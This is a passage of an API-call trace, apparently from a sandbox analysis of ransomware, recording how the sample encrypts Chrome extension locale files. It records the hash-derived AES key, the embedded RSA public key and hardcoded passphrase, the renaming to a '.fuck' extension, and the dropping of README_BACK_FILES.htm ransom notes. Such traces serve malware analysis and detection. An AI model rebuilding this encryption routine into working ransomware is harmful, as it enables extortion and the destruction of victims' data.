[0254.387] FindClose (in: hFindFile=0x2e18428 | out: hFindFile=0x2e18428) returned 1 [0254.387] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0254.387] AreFileApisANSI () returned 1 [0254.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.387] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.388] GetFileType (hFile=0x5d50) returned 0x1 [0254.388] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.390] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.390] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0254.391] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.391] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.391] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.391] GetLastError () returned 0x0 [0254.391] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json")) returned 0x20 [0254.392] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0254.392] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.393] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.395] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.396] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16b78) returned 1 [0254.399] CryptCreateHash (in: hProv=0x2e16b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.399] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.399] CryptHashData (hHash=0x2e18528, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.399] CryptDeriveKey (in: hProv=0x2e16b78, Algid=0x6610, hBaseData=0x2e18528, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18568) returned 1 [0254.399] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.399] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.399] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e170c8) returned 1 [0254.400] CryptImportPublicKeyInfo (in: hCryptProv=0x2e170c8, dwCertEncodingType=0x1, pInfo=0x298e4d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e500*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e508*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e187e8) returned 1 [0254.400] CryptEncrypt (in: hKey=0x2e187e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.400] CryptEncrypt (in: hKey=0x2e187e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e171d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e171d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.400] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e171d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e171d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.402] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc1, lpOverlapped=0x0) returned 1 [0254.403] CryptEncrypt (in: hKey=0x2e18568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0254.403] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0254.404] CloseHandle (hObject=0x5d5c) returned 1 [0254.404] CloseHandle (hObject=0x5d60) returned 1 [0254.404] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0254.407] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0254.408] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.gsg")) returned 1 [0254.409] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.fuck")) returned 1 [0254.411] CryptDestroyHash (hHash=0x2e18528) returned 1 [0254.411] CryptDestroyKey (hKey=0x2e18568) returned 1 [0254.411] CryptReleaseContext (hProv=0x2e16b78, dwFlags=0x0) returned 1 [0254.411] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.411] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0254.411] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0254.411] AreFileApisANSI () returned 1 [0254.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.411] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.412] GetFileType (hFile=0x5d50) returned 0x1 [0254.412] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.414] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.414] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0254.414] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.414] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.414] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.414] GetLastError () returned 0x0 [0254.414] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json")) returned 0x20 [0254.414] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0254.415] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.416] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.417] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.417] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.420] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.420] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.420] CryptHashData (hHash=0x2e18428, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.420] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18428, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18668) returned 1 [0254.420] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.420] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.421] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17728) returned 1 [0254.421] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17728, dwCertEncodingType=0x1, pInfo=0x298e810*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e840*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e848*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e185a8) returned 1 [0254.421] CryptEncrypt (in: hKey=0x2e185a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.421] CryptEncrypt (in: hKey=0x2e185a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e167c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e167c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.421] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e167c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e167c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.423] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x12a, lpOverlapped=0x0) returned 1 [0254.442] CryptEncrypt (in: hKey=0x2e18668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x12a, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0254.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0254.443] CloseHandle (hObject=0x5d60) returned 1 [0254.443] CloseHandle (hObject=0x5d5c) returned 1 [0254.443] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0254.446] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0254.447] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.gsg")) returned 1 [0254.448] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.fuck")) returned 1 [0254.450] CryptDestroyHash (hHash=0x2e18428) returned 1 [0254.450] CryptDestroyKey (hKey=0x2e18668) returned 1 [0254.450] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.450] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.450] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0254.451] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0254.451] AreFileApisANSI () returned 1 [0254.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.451] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.452] GetFileType (hFile=0x5d50) returned 0x1 [0254.452] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.453] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.453] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18528 [0254.455] FindNextFileA (in: hFindFile=0x2e18528, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.455] FindNextFileA (in: hFindFile=0x2e18528, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.455] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.455] GetLastError () returned 0x0 [0254.455] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json")) returned 0x20 [0254.455] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0254.456] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 